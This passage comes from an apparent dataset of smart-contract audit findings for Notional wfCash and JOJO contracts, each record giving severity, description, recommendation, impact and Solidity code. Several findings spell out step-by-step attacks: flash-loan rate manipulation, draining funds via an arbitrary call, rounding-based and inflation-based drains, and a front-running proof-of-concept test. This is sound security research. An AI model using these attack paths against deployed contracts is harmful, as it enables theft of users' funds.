internally when computing the prime cash to be withdrawn for a given fCash. Thus, it is subjected to manipulation.\\n```\\nFile: wfCashLogic.sol\\n /// @dev Sells an fCash share back on the Notional AMM\\n function _sellfCash(\\n address receiver,\\n uint256 fCashToSell,\\n uint32 maxImpliedRate\\n ) private returns (uint256 tokensTransferred) {\\n (IERC20 token, bool isETH) = getToken(true); \\n uint256 balanceBefore = isETH ? WETH.balanceOf(address(this)) : token.balanceOf(address(this)); \\n uint16 currencyId = getCurrencyId(); \\n\\n (uint256 initialCashBalance, uint256 fCashBalance) = getBalances(); \\n bool hasInsufficientfCash = fCashBalance < fCashToSell; \\n\\n uint256 primeCashToWithdraw; \\n if (hasInsufficientfCash) {\\n // If there is insufficient fCash, calculate how much prime cash would be purchased if the\\n // given fCash amount would be sold and that will be how much the wrapper will withdraw and\\n // send to the receiver. Since fCash always sells at a discount to underlying prior to maturity,\\n // the wrapper is guaranteed to have sufficient cash to send to the account.\\n (/* */, primeCashToWithdraw, /* */, /* */) = NotionalV2.getPrincipalFromfCashBorrow( \\n currencyId,\\n fCashToSell, \\n getMaturity(),\\n 0, \\n block.timestamp\\n ); \\n // If this is zero then it signifies that the trade will fail.\\n require(primeCashToWithdraw > 0, \"Redeem Failed\"); \\n\\n // Re-write the fCash to sell to the entire fCash balance.\\n fCashToSell = fCashBalance;\\n }\\n```\\n\\nWithin the `CalculationViews.getPrincipalFromfCashBorrow` view function, it will rely on the `InterestRateCurve.calculatefCashTrade` function to compute the cash to be returned based on the current interest rate model.\\nAssume that the current utilization rate is slightly above Kink 1. When Bob redeems his wfCash, the interest rate used falls within the gentle slope between Kink 1 and Kink 2. Let the interest rate based on current utilization be 4%. 
The amount of fCash will be discounted back with 4% interest rate to find out the cash value (present value) and the returned value is $x$.\\nObserved that before Kink 1, the interest rate changed sharply. If one could nudge the utilization toward the left (toward zero) and cause the utilization to fall between Kink 0 and Kink 1, the interest rate would fall sharply. Since the utilization is computed as on `utilization = totalfCash/totalCashUnderlying`, one could deposit prime cash to the market to increase the denominator (totalCashUnderlying) to bring down the utilization rate.\\nBob deposits a specific amount of prime cash (either by its own funds or flash-loan) to reduce the utilization rate, which results in a reduction in interest rate. Assume that the interest rate reduces to 1.5%. The amount of fCash will be discounted with a lower interest rate of 1.5%, which will result in higher cash value, and the returned value/received cash is $y$.\\n$y > x$. So Bob received $y - x$ more cash compared to if he had not performed the manipulation. Since this is a zero-sum, Bob's gain is the protocol loss.\\nчAvoid using spot data when computing the amount of assets that the user is entitled to during redemption. Consider using a TWAP/Time-lagged oracle to guard against potential manipulation.чMalicious users could receive more cash than expected during redemption by performing manipulation. Since this is a zero-sum, the attacker's gain is the protocol loss.ч```\\nFile: wfCashLogic.sol\\n /// @dev Sells an fCash share back on the Notional AMM\\n function _sellfCash(\\n address receiver,\\n uint256 fCashToSell,\\n uint32 maxImpliedRate\\n ) private returns (uint256 tokensTransferred) {\\n (IERC20 token, bool isETH) = getToken(true); \\n uint256 balanceBefore = isETH ? 
WETH.balanceOf(address(this)) : token.balanceOf(address(this)); \\n uint16 currencyId = getCurrencyId(); \\n\\n (uint256 initialCashBalance, uint256 fCashBalance) = getBalances(); \\n bool hasInsufficientfCash = fCashBalance < fCashToSell; \\n\\n uint256 primeCashToWithdraw; \\n if (hasInsufficientfCash) {\\n // If there is insufficient fCash, calculate how much prime cash would be purchased if the\\n // given fCash amount would be sold and that will be how much the wrapper will withdraw and\\n // send to the receiver. Since fCash always sells at a discount to underlying prior to maturity,\\n // the wrapper is guaranteed to have sufficient cash to send to the account.\\n (/* */, primeCashToWithdraw, /* */, /* */) = NotionalV2.getPrincipalFromfCashBorrow( \\n currencyId,\\n fCashToSell, \\n getMaturity(),\\n 0, \\n block.timestamp\\n ); \\n // If this is zero then it signifies that the trade will fail.\\n require(primeCashToWithdraw > 0, \"Redeem Failed\"); \\n\\n // Re-write the fCash to sell to the entire fCash balance.\\n fCashToSell = fCashBalance;\\n }\\n```\\n -External lending can exceed the thresholdчmediumчDue to an incorrect calculation of the max lending amount, external lending can exceed the external withdrawal threshold. If this restriction/threshold is not adhered to, users or various core functionalities within the protocol will have issues redeeming or withdrawing their prime cash.\\nThe following is the extract from the Audit Scope Documentation provided by the protocol team on the contest page that describes the external withdraw threshold:\\n● External Withdraw Threshold: ensures that Notional has sufficient liquidity to withdraw from an external lending market. If Notional has 1000 units of underlying lent out on Aave, it requires 1000 * externalWithdrawThreshold units of underlying to be available on Aave for withdraw. This ensures there is sufficient buffer to process the redemption of Notional funds. 
If available liquidity on Aave begins to drop due to increased utilization, Notional will automatically begin to withdraw its funds from Aave to ensure that they are available for withdrawal on Notional itself.\\nTo ensure the redeemability of Notional's funds on external lending markets, Notional requires there to be redeemable funds on the external lending market that are a multiple of the funds that Notional has lent on that market itself.\\nAssume that the `externalWithdrawThreshold` is 200% and the underlying is USDC. Therefore, `PERCENTAGE_DECIMALS/externalWithdrawThreshold = 100/200 = 0.5` (Line 83-84 below). This means that the number of USDC to be available on AAVE for withdrawal must be two (2) times the number of USDC Notional lent out on AAVE (A multiple of 2).\\nThe `externalUnderlyingAvailableForWithdraw` stores the number of liquidity in USDC on the AAVE pool available to be withdrawn.\\nIf `externalUnderlyingAvailableForWithdraw` is 1000 USDC and `currentExternalUnderlyingLend` is 400 USDC, this means that the remaining 600 USDC liquidity on the AAVE pool is not owned by Notional.\\nThe `maxExternalUnderlyingLend` will be `600 * 0.5 = 300`. 
Thus, the maximum amount that Notional can lend externally at this point is 300 USDC.\\nAssume that after Notional has lent 300 USDC externally to the AAVE pool.\\nThe `currentExternalUnderlyingLend` will become `400+300=700`, and the `externalUnderlyingAvailableForWithdraw` will become `1000+300=1300`\\nFollowing is the percentage of USDC in AAVE that belong to Notional\\n```\\n700/1300 = 0.5384615385 (53%).\\n```\\n\\nAt this point, the invariant is broken as the number of USDC to be available on AAVE for withdrawal is less than two (2) times the number of USDC lent out on AAVE after the lending.\\n```\\nFile: ExternalLending.sol\\n function getTargetExternalLendingAmount(\\n..SNIP..\\n uint256 maxExternalUnderlyingLend;\\n if (oracleData.currentExternalUnderlyingLend < oracleData.externalUnderlyingAvailableForWithdraw) {\\n maxExternalUnderlyingLend =\\n (oracleData.externalUnderlyingAvailableForWithdraw - oracleData.currentExternalUnderlyingLend)\\n .mul(uint256(Constants.PERCENTAGE_DECIMALS))\\n .div(rebalancingTargetData.externalWithdrawThreshold);\\n } else {\\n maxExternalUnderlyingLend = 0;\\n }\\n```\\n\\nThe root cause is that when USDC is deposited to AAVE to get aUSDC, the total USDC in the pool increases. 
Therefore, using the current amount of USDC in the pool to determine the maximum deposit amount is not an accurate measure of liquidity risk.чTo ensure that a deposit does not exceed the threshold, the following formula should be used to determine the maximum deposit amount:\\nLet's denote:\\n$T$ as the externalWithdrawThreshold $L$ as the currentExternalUnderlyingLend $W$ as the externalUnderlyingAvailableForWithdraw $D$ as the Deposit (the variable we want to solve for)\\n$$ T = \\frac{L + D}{W + D} $$\\nSolving $D$, the formula for calculating the maximum deposit ($D$) is\\n$$ D = \\frac{TW-L}{1-T} $$\\nUsing back the same example in the \"Vulnerability Detail\" section.\\nThe maximum deposit amount is as follows:\\n```\\nD = (TW - L) / (1 - T)\\nD = (0.5 * 1000 - 400) / (1 - 0.5)\\nD = (500 - 400) / 0.5 = 200\\n```\\n\\nIf 200 USDC is lent out, it will still not exceed the threshold of 200%, which demonstrates that the formula is working as intended in keeping the multiple of two (200%) constant before and after the deposit.\\n```\\n(400 + 200) / (1000 + 200) = 0.5\\n```\\nчTo ensure the redeemability of Notional's funds on external lending markets, Notional requires there to be redeemable funds on the external lending market that are a multiple of the funds that Notional has lent on that market itself.\\nIf this restriction is not adhered to, users or various core functionalities within the protocol will have issues redeeming or withdrawing their prime cash. 
For instance, users might not be able to withdraw their assets from the protocol due to insufficient liquidity, or liquidation cannot be carried out due to lack of liquidity, resulting in bad debt accumulating within the protocol and negatively affecting the protocol's solvency.ч```\\n700/1300 = 0.5384615385 (53%).\\n```\\n -Rebalance will be delayed due to revertчmediumчThe rebalancing of unhealthy currencies will be delayed due to a revert, resulting in an excess of liquidity being lent out in the external market. This might affect the liquidity of the protocol, potentially resulting in withdrawal or liquidation having issues executed due to insufficient liquidity.\\nAssume that Notional supports 5 currencies ($A, B, C, D, E$), and the Gelato bot is configured to call the `checkRebalance` function every 30 minutes.\\nAssume that the current market condition is volatile. Thus, the inflow and outflow of assets to Notional, utilization rate, and available liquidity at AAVE change frequently. As a result, the target amount that should be externally lent out also changes frequently since the computation of this value relies on the spot market information.\\nAt T1, when the Gelato bot calls the `checkRebalance()` view function, it returns that currencies $A$, $B$, and $C$ are unhealthy and need to be rebalanced.\\nShortly after receiving the execution payload from the `checkRebalance()`, the bot submits the rebalancing TX to the mempool for execution at T2.\\nWhen the rebalancing TX is executed at T3, one of the currencies (Currency $A$) becomes healthy. As a result, the require check at Line 326 will revert and the entire rebalancing transaction will be cancelled. 
Thus, currencies $B$ and $C$ that are still unhealthy at this point will not be rebalanced.\\nIf this issue occurs frequently or repeatedly over a period of time, the rebalancing of unhealthy currencies will be delayed.\\n```\\nFile: TreasuryAction.sol\\n function _rebalanceCurrency(uint16 currencyId, bool useCooldownCheck) private { \\n RebalancingContextStorage memory context = LibStorage.getRebalancingContext()[currencyId]; \\n // Accrues interest up to the current block before any rebalancing is executed\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId); \\n PrimeRate memory pr = PrimeRateLib.buildPrimeRateStateful(currencyId); \\n\\n bool hasCooldownPassed = _hasCooldownPassed(context); \\n (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) = \\n _isExternalLendingUnhealthy(currencyId, oracle, pr); \\n\\n // Cooldown check is bypassed when the owner updates the rebalancing targets\\n if (useCooldownCheck) require(hasCooldownPassed || isExternalLendingUnhealthy); \\n```\\nчIf one of the currencies becomes healthy when the rebalance TX is executed, consider skipping this currency and move on to execute the rebalance on the rest of the currencies that are still unhealthy.\\n```\\nfunction _rebalanceCurrency(uint16 currencyId, bool useCooldownCheck) private { \\n RebalancingContextStorage memory context = LibStorage.getRebalancingContext()[currencyId]; \\n // Accrues interest up to the current block before any rebalancing is executed\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId); \\n PrimeRate memory pr = PrimeRateLib.buildPrimeRateStateful(currencyId); \\n\\n bool hasCooldownPassed = _hasCooldownPassed(context); \\n (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) = \\n _isExternalLendingUnhealthy(currencyId, oracle, pr); \\n\\n // Cooldown check is bypassed when the owner updates the 
rebalancing targets\\n// Remove the line below\\n if (useCooldownCheck) require(hasCooldownPassed || isExternalLendingUnhealthy);\\n// Add the line below\\n if (useCooldownCheck && !hasCooldownPassed && !isExternalLendingUnhealthy) return;\\n```\\nчThe rebalancing of unhealthy currencies will be delayed, resulting in an excess of liquidity being lent out to the external market. This might affect the liquidity of the protocol, potentially resulting in withdrawal or liquidation having issues executed due to insufficient liquidity.ч```\\nFile: TreasuryAction.sol\\n function _rebalanceCurrency(uint16 currencyId, bool useCooldownCheck) private { \\n RebalancingContextStorage memory context = LibStorage.getRebalancingContext()[currencyId]; \\n // Accrues interest up to the current block before any rebalancing is executed\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId); \\n PrimeRate memory pr = PrimeRateLib.buildPrimeRateStateful(currencyId); \\n\\n bool hasCooldownPassed = _hasCooldownPassed(context); \\n (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) = \\n _isExternalLendingUnhealthy(currencyId, oracle, pr); \\n\\n // Cooldown check is bypassed when the owner updates the rebalancing targets\\n if (useCooldownCheck) require(hasCooldownPassed || isExternalLendingUnhealthy); \\n```\\n -Rebalance might be skipped even if the external lending is unhealthyчmediumчThe deviation between the target and current lending amount (offTargetPercentage) will be underestimated due to incorrect calculation. 
As a result, a rebalancing might be skipped even if the existing external lending is unhealthy.\\nThe formula used within the `_isExternalLendingUnhealthy` function below calculating the `offTargetPercentage` can be simplified as follows for the readability of this issue.\\n$$ offTargetPercentage = \\frac{\\mid currentExternalUnderlyingLend - targetAmount \\mid}{currentExternalUnderlyingLend + targetAmount} \\times 100% $$\\nAssume that the `targetAmount` is 100 and `currentExternalUnderlyingLend` is 90. The off-target percentage will be 5.26%, which is incorrect.\\n```\\noffTargetPercentage = abs(90 - 100) / (100 + 90) = 10 / 190 = 0.0526 = 5.26%\\n```\\n\\nThe correct approach is to calculate the off-target percentages as a ratio of the difference to the target:\\n$$ offTargetPercentage = \\frac{\\mid currentExternalUnderlyingLend - targetAmount \\mid}{targetAmount} \\times 100% $$\\n```\\noffTargetPercentage = abs(90 - 100) / (100) = 10 / 100 = 0.1 = 10%\\n```\\n\\n```\\nFile: TreasuryAction.sol\\n    function _isExternalLendingUnhealthy(\\n        uint16 currencyId,\\n        IPrimeCashHoldingsOracle oracle,\\n        PrimeRate memory pr\\n    ) internal view returns (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) {\\n        oracleData = oracle.getOracleData(); \\n\\n        RebalancingTargetData memory rebalancingTargetData =\\n            LibStorage.getRebalancingTargets()[currencyId][oracleData.holding]; \\n        PrimeCashFactors memory factors = PrimeCashExchangeRate.getPrimeCashFactors(currencyId); \\n        Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId); \\n\\n        targetAmount = ExternalLending.getTargetExternalLendingAmount(\\n            underlyingToken, factors, rebalancingTargetData, oracleData, pr\\n        ); \\n\\n        if (oracleData.currentExternalUnderlyingLend == 0) { \\n            // If this is zero then there is no outstanding lending.\\n            isExternalLendingUnhealthy = false; \\n        } else {\\n            uint256 offTargetPercentage = oracleData.currentExternalUnderlyingLend.toInt() \\n
.sub(targetAmount.toInt()).abs()\\n .toUint()\\n .mul(uint256(Constants.PERCENTAGE_DECIMALS))\\n .div(targetAmount.add(oracleData.currentExternalUnderlyingLend)); \\n \\n // prevent rebalance if change is not greater than 1%, important for health check and avoiding triggering\\n // rebalance shortly after rebalance on minimum change\\n isExternalLendingUnhealthy = \\n (targetAmount < oracleData.currentExternalUnderlyingLend) && (offTargetPercentage > 0); \\n }\\n }\\n```\\nчConsider calculating the off-target percentages as a ratio of the difference to the target:\\n$$ offTargetPercentage = \\frac{\\mid currentExternalUnderlyingLend - targetAmount \\mid}{targetAmount} \\times 100% $$чThe deviation between the target and current lending amount (offTargetPercentage) will be underestimated by approximately half the majority of the time. As a result, a rebalance intended to remediate the unhealthy external lending might be skipped since the code incorrectly assumes that it has not hit the off-target percentage. External lending beyond the target will affect the liquidity of the protocol, potentially resulting in withdrawal or liquidation, having issues executed due to insufficient liquidity.ч```\\noffTargetPercentage = abs(90 - 100) / (100 + 90) = 10 / 190 = 0.0526 = 5.26%\\n```\\n -All funds can be stolen from JOJODealerчhighч`Funding._withdraw()` makes arbitrary call with user specified params. 
User can for example make ERC20 to himself and steal funds.\\nUser can specify parameters `param` and `to` when withdraws:\\n```\\n function executeWithdraw(address from, address to, bool isInternal, bytes memory param) external nonReentrant {\\n Funding.executeWithdraw(state, from, to, isInternal, param);\\n }\\n```\\n\\nIn the end of `_withdraw()` function address `to` is called with that bytes param:\\n```\\n function _withdraw(\\n Types.State storage state,\\n address spender,\\n address from,\\n address to,\\n uint256 primaryAmount,\\n uint256 secondaryAmount,\\n bool isInternal,\\n bytes memory param\\n )\\n private\\n {\\n // rest of code\\n\\n if (param.length != 0) {\\n require(Address.isContract(to), \"target is not a contract\");\\n (bool success,) = to.call(param);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n }\\n }\\n```\\n\\nAs an attack vector attacker can execute withdrawal of 1 wei to USDC contract and pass calldata to transfer arbitrary USDC amount to himself via USDC contract.чDon't make arbitrary call with user specified paramsчAll funds can be stolen from JOJODealerч```\\n function executeWithdraw(address from, address to, bool isInternal, bytes memory param) external nonReentrant {\\n Funding.executeWithdraw(state, from, to, isInternal, param);\\n }\\n```\\n -FundingRateArbitrage contract can be drained due to rounding errorчhighчIn the `requestWithdraw`, rounding in the wrong direction is done which can lead to contract being drained.\\nIn the `requestWithdraw` function in `FundingRateArbitrage`, we find the following lines of code:\\n```\\njusdOutside[msg.sender] -= repayJUSDAmount;\\nuint256 index = getIndex();\\nuint256 lockedEarnUSDCAmount = jusdOutside[msg.sender].decimalDiv(index);\\nrequire(\\n earnUSDCBalance[msg.sender] >= lockedEarnUSDCAmount, \"lockedEarnUSDCAmount is bigger than 
earnUSDCBalance\"\\n);\\nwithdrawEarnUSDCAmount = earnUSDCBalance[msg.sender] - lockedEarnUSDCAmount;\\n```\\n\\nBecause we round down when calculating `lockedEarnUSDCAmount`, `withdrawEarnUSDCAmount` is higher than it should be, which leads to us allowing the user to withdraw more than we should allow them to given the amount of JUSD they repaid.\\nThe execution of this is a bit more complicated, let's go through an example. We will assume there's a bunch of JUSD existing in the contract and the attacker is the first to deposit.\\nSteps:\\nThe attacker deposits `1` unit of USDC and then manually sends in another 100 * 10^6 - `1` (not through deposit, just a transfer). The share price / price per earnUSDC will now be $100. Exactly one earnUSDC is in existence at the moment.\\nNext the attacker creates a new EOA and deposits a little over $101 worth of USDC (so that after fees we can get to the $100), giving one earnUSDC to the EOA. The attacker will receive around $100 worth of `JUSD` from doing this.\\nAttacker calls `requestWithdraw` with `repayJUSDAmount` = `1` with the second newly created EOA\\n`lockedEarnUSDCAmount` is rounded down to 0 (since `repayJUSDAmount` is subtracted from jusdOutside[msg.sender]\\n`withdrawEarnUSDCAmount` will be `1`\\nAfter `permitWithdrawRequests` is called, attacker will be able to withdraw the $100 they deposited through the second EOA (granted, they lost the deposit and withdrawal fees) while only having sent `1` unit of `JUSD` back. 
This leads to massive profit for the attacker.\\nAttacker can repeat steps 2-6 constantly until the contract is drained of JUSD.чRound up instead of downчAll JUSD in the contract can be drainedч```\\njusdOutside[msg.sender] -= repayJUSDAmount;\\nuint256 index = getIndex();\\nuint256 lockedEarnUSDCAmount = jusdOutside[msg.sender].decimalDiv(index);\\nrequire(\\n earnUSDCBalance[msg.sender] >= lockedEarnUSDCAmount, \"lockedEarnUSDCAmount is bigger than earnUSDCBalance\"\\n);\\nwithdrawEarnUSDCAmount = earnUSDCBalance[msg.sender] - lockedEarnUSDCAmount;\\n```\\n -`JUSDBankStorage::getTRate()`,`JUSDBankStorage::accrueRate()` are calculated differently, and the data calculation is biased, Causes the `JUSDBank` contract funciton result to be incorrectчmediumч```\\n function accrueRate() public {\\n uint256 currentTimestamp = block.timestamp;\\n if (currentTimestamp == lastUpdateTimestamp) {\\n return;\\n }\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n tRate = tRate.decimalMul((timeDifference * borrowFeeRate) / Types.SECONDS_PER_YEAR + 1e18);\\n lastUpdateTimestamp = currentTimestamp;\\n }\\n\\n function getTRate() public view returns (uint256) {\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n return tRate + (borrowFeeRate * timeDifference) / Types.SECONDS_PER_YEAR;\\n }\\n```\\n\\nJUSDBankStorage::getTRate(),JUSDBankStorage::accrueRate() are calculated differently, and the data calculation is biased, resulting in the JUSDBank contract not being executed correctly\\nThe wrong result causes the funciton calculation results of `JUSDBank::_isAccountSafe()`, `JUSDBank::flashLoan()`, `JUSDBank::_handleBadDebt`, etc. 
to be biased,and all functions that call the relevant function will be biasedчUse the same calculation formula:\\n```\\n function accrueRate() public {\\n uint256 currentTimestamp = block.timestamp;\\n if (currentTimestamp == lastUpdateTimestamp) {\\n return;\\n }\\n uint256 timeDifference = block.timestamp // Remove the line below\\n uint256(lastUpdateTimestamp);\\n tRate = tRate.decimalMul((timeDifference * borrowFeeRate) / Types.SECONDS_PER_YEAR // Add the line below\\n 1e18);\\n lastUpdateTimestamp = currentTimestamp;\\n }\\n\\n function getTRate() public view returns (uint256) {\\n uint256 timeDifference = block.timestamp // Remove the line below\\n uint256(lastUpdateTimestamp);\\n// Remove the line below\\n return tRate // Add the line below\\n (borrowFeeRate * timeDifference) / Types.SECONDS_PER_YEAR;\\n// Add the line below\\n return tRate.decimalMul((timeDifference * borrowFeeRate) / Types.SECONDS_PER_YEAR // Add the line below\\n 1e18);\\n }\\n```\\nчCauses the `JUSDBank` contract funciton result to be incorrectч```\\n function accrueRate() public {\\n uint256 currentTimestamp = block.timestamp;\\n if (currentTimestamp == lastUpdateTimestamp) {\\n return;\\n }\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n tRate = tRate.decimalMul((timeDifference * borrowFeeRate) / Types.SECONDS_PER_YEAR + 1e18);\\n lastUpdateTimestamp = currentTimestamp;\\n }\\n\\n function getTRate() public view returns (uint256) {\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n return tRate + (borrowFeeRate * timeDifference) / Types.SECONDS_PER_YEAR;\\n }\\n```\\n -Funding#requestWithdraw uses incorrect withdraw addressчmediumчWhen requesting a withdraw, `msg.sender` is used in place of the `from` address. This means that withdraws cannot be initiated on behalf of other users. 
This will break integrations that depend on this functionality leading to irretrievable funds.\\nFunding.sol#L69-L82\\n```\\nfunction requestWithdraw(\\n Types.State storage state,\\n address from,\\n uint256 primaryAmount,\\n uint256 secondaryAmount\\n)\\n external\\n{\\n require(isWithdrawValid(state, msg.sender, from, primaryAmount, secondaryAmount), Errors.WITHDRAW_INVALID);\\n state.pendingPrimaryWithdraw[msg.sender] = primaryAmount;\\n state.pendingSecondaryWithdraw[msg.sender] = secondaryAmount;\\n state.withdrawExecutionTimestamp[msg.sender] = block.timestamp + state.withdrawTimeLock;\\n emit RequestWithdraw(msg.sender, primaryAmount, secondaryAmount, state.withdrawExecutionTimestamp[msg.sender]);\\n}\\n```\\n\\nAs shown above the withdraw is accidentally queue to `msg.sender` NOT the `from` address. This means that all withdraws started on behalf of another user will actually trigger a withdraw `from` the `operator`. The result is that withdraw cannot be initiated on behalf of other users, even if the allowance is set properly, leading to irretrievable fundsчChange all occurrences of `msg.sender` in stage changes to `from` instead.чRequesting withdraws for other users is broken and strands fundsч```\\nfunction requestWithdraw(\\n Types.State storage state,\\n address from,\\n uint256 primaryAmount,\\n uint256 secondaryAmount\\n)\\n external\\n{\\n require(isWithdrawValid(state, msg.sender, from, primaryAmount, secondaryAmount), Errors.WITHDRAW_INVALID);\\n state.pendingPrimaryWithdraw[msg.sender] = primaryAmount;\\n state.pendingSecondaryWithdraw[msg.sender] = secondaryAmount;\\n state.withdrawExecutionTimestamp[msg.sender] = block.timestamp + state.withdrawTimeLock;\\n emit RequestWithdraw(msg.sender, primaryAmount, secondaryAmount, state.withdrawExecutionTimestamp[msg.sender]);\\n}\\n```\\n -FundRateArbitrage is vulnerable to inflation attacksчmediumчWhen index is calculated, it is figured by dividing the net value of the contract (including USDC held) 
by the current supply of earnUSDC. Through deposit and donation this ratio can be inflated. Then when others deposit, their deposit can be taken almost completely via rounding.\\nFundingRateArbitrage.sol#L98-L104\\n```\\nfunction getIndex() public view returns (uint256) {\\n if (totalEarnUSDCBalance == 0) {\\n return 1e18;\\n } else {\\n return SignedDecimalMath.decimalDiv(getNetValue(), totalEarnUSDCBalance);\\n }\\n}\\n```\\n\\nIndex is calculated is by dividing the net value of the contract (including USDC held) by the current supply of totalEarnUSDCBalance. This can be inflated via donation. Assume the user deposits 1 share then donates 100,000e6 USDC. The exchange ratio is now 100,000e18 which causes issues during deposits.\\nFundingRateArbitrage.sol#L258-L275\\n```\\nfunction deposit(uint256 amount) external {\\n require(amount != 0, \"deposit amount is zero\");\\n uint256 feeAmount = amount.decimalMul(depositFeeRate);\\n if (feeAmount > 0) {\\n amount -= feeAmount;\\n IERC20(usdc).transferFrom(msg.sender, owner(), feeAmount);\\n }\\n uint256 earnUSDCAmount = amount.decimalDiv(getIndex());\\n IERC20(usdc).transferFrom(msg.sender, address(this), amount);\\n JOJODealer(jojoDealer).deposit(0, amount, msg.sender);\\n earnUSDCBalance[msg.sender] += earnUSDCAmount;\\n jusdOutside[msg.sender] += amount;\\n totalEarnUSDCBalance += earnUSDCAmount;\\n require(getNetValue() <= maxNetValue, \"net value exceed limitation\");\\n uint256 quota = maxUsdcQuota[msg.sender] == 0 ? defaultUsdcQuota : maxUsdcQuota[msg.sender];\\n require(earnUSDCBalance[msg.sender].decimalMul(getIndex()) <= quota, \"usdc amount bigger than quota\");\\n emit DepositToHedging(msg.sender, amount, feeAmount, earnUSDCAmount);\\n}\\n```\\n\\nNotice earnUSDCAmount is amount / index. 
With the inflated index that would mean that any deposit under 100,000e6 will get zero shares, making it exactly like the standard ERC4626 inflation attack.чUse a virtual offset as suggested by OZ for their ERC4626 contractsчSubsequent user deposits can be stolenч```\\nfunction getIndex() public view returns (uint256) {\\n if (totalEarnUSDCBalance == 0) {\\n return 1e18;\\n } else {\\n return SignedDecimalMath.decimalDiv(getNetValue(), totalEarnUSDCBalance);\\n }\\n}\\n```\\n -Lender transactions can be front-run, leading to lost fundsчhighчUsers can mint wfCash tokens via `mintViaUnderlying` by passing a variable `minImpliedRate` to guard against trade slippage. If the market interest is lower than expected by the user, the transaction will revert due to slippage protection. However, if the user mints a share larger than maxFCash, the `minImpliedRate` check is not performed.\\n```\\n function mintViaUnderlying(\\n uint256 depositAmountExternal,\\n uint88 fCashAmount,\\n address receiver,\\n uint32 minImpliedRate//@audit when lendAmount bigger than maxFCash lack of minRate protect.\\n ) external override {\\n (/* */, uint256 maxFCash) = getTotalFCashAvailable();\\n _mintInternal(depositAmountExternal, fCashAmount, receiver, minImpliedRate, maxFCash);\\n }\\n```\\n\\n```\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION);//@audit-info fCashAmount * (underlyingTokenDecimals) / 1e8\\n require(fCashAmountExternal <= depositAmountExternal);\\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);//@audit check this.\\n } \\n```\\n\\nImagine the following scenario:\\nlender deposit Underlying token to `mint` some shares and set a `minImpliedRate` to protect the trsanction\\nalice front-run her 
transaction invoke `mint` to `mint` some share\\nthe shares of lender `mint` now is bigger than `maxFCash`\\nnow the lender `lending at zero`\\n```\\n function testDepositViaUnderlying() public {\\n address alice = makeAddr(\"alice\");\\n deal(address(asset), LENDER, 8800 * precision, true);\\n deal(address(asset), alice, 5000 * precision, true);\\n\\n //alice deal.\\n vm.stopPrank();\\n vm.startPrank(alice);\\n asset.approve(address(w), type(uint256).max);\\n \\n //==============================LENDER START=============================//\\n vm.stopPrank();\\n vm.startPrank(LENDER);\\n asset.approve(address(w), type(uint256).max);\\n //user DAI balance before:\\n assertEq(asset.balanceOf(LENDER), 8800e18);\\n\\n (/* */, uint256 maxFCash) = w.getTotalFCashAvailable();\\n console2.log(\"current maxFCash:\",maxFCash);\\n\\n //LENDER mintViaUnderlying will revert due to slippage.\\n uint32 minImpliedRate = 0.15e9;\\n vm.expectRevert(\"Trade failed, slippage\");\\n w.mintViaUnderlying(5000e18,5000e8,LENDER,minImpliedRate);\\n //==============================LENDER END=============================//\\n\\n //======================alice frontrun to mint some shares.============//\\n vm.stopPrank();\\n vm.startPrank(alice);\\n w.mint(5000e8,alice);\\n\\n //==========================LENDER TX =================================//\\n vm.stopPrank();\\n vm.startPrank(LENDER);\\n asset.approve(address(w), type(uint256).max);\\n //user DAI balance before:\\n assertEq(asset.balanceOf(LENDER), 8800e18);\\n\\n //LENDER mintViaUnderlying will success.\\n w.mintViaUnderlying(5000e18,5000e8,LENDER,minImpliedRate);\\n\\n console2.log(\"lender mint token:\",w.balanceOf(LENDER));\\n console2.log(\"lender cost DAI:\",8800e18 - asset.balanceOf(LENDER));\\n }\\n```\\n\\nFrom the above test, we can observe that if `maxFCasha` is greater than `5000e8`, the lender's transaction will be reverted due to \"Trade failed, slippage.\" Subsequently, if Alice front-runs by invoking `mint` to create some 
shares before the lender, the lender's transaction will succeed. Therefore, the lender's `minImpliedRate` check will be bypassed, leading to a loss of funds for the lender.чadd a check inside `_mintInternal`\\n```\\n if (maxFCash < fCashAmount) {\\n// Add the line below\\n require(minImpliedRate ==0,\"Trade failed, slippage\"); \\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION);//@audit-info fCashAmount * (underlyingTokenDecimals) / 1e8\\n require(fCashAmountExternal <= depositAmountExternal);\\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);//@audit check this.\\n }\\n```\\nчlender lost of fundsч```\\n function mintViaUnderlying(\\n uint256 depositAmountExternal,\\n uint88 fCashAmount,\\n address receiver,\\n uint32 minImpliedRate//@audit when lendAmount bigger than maxFCash lack of minRate protect.\\n ) external override {\\n (/* */, uint256 maxFCash) = getTotalFCashAvailable();\\n _mintInternal(depositAmountExternal, fCashAmount, receiver, minImpliedRate, maxFCash);\\n }\\n```\\n -Residual ETH will not be sent back to users during the minting of wfCashчhighчResidual ETH will not be sent back to users, resulting in a loss of assets.\\nAt Line 67, residual ETH within the `depositUnderlyingToken` function will be sent as Native ETH back to the `msg.sender`, which is this wfCash Wrapper contract.\\n```\\nFile: wfCashLogic.sol\\n function 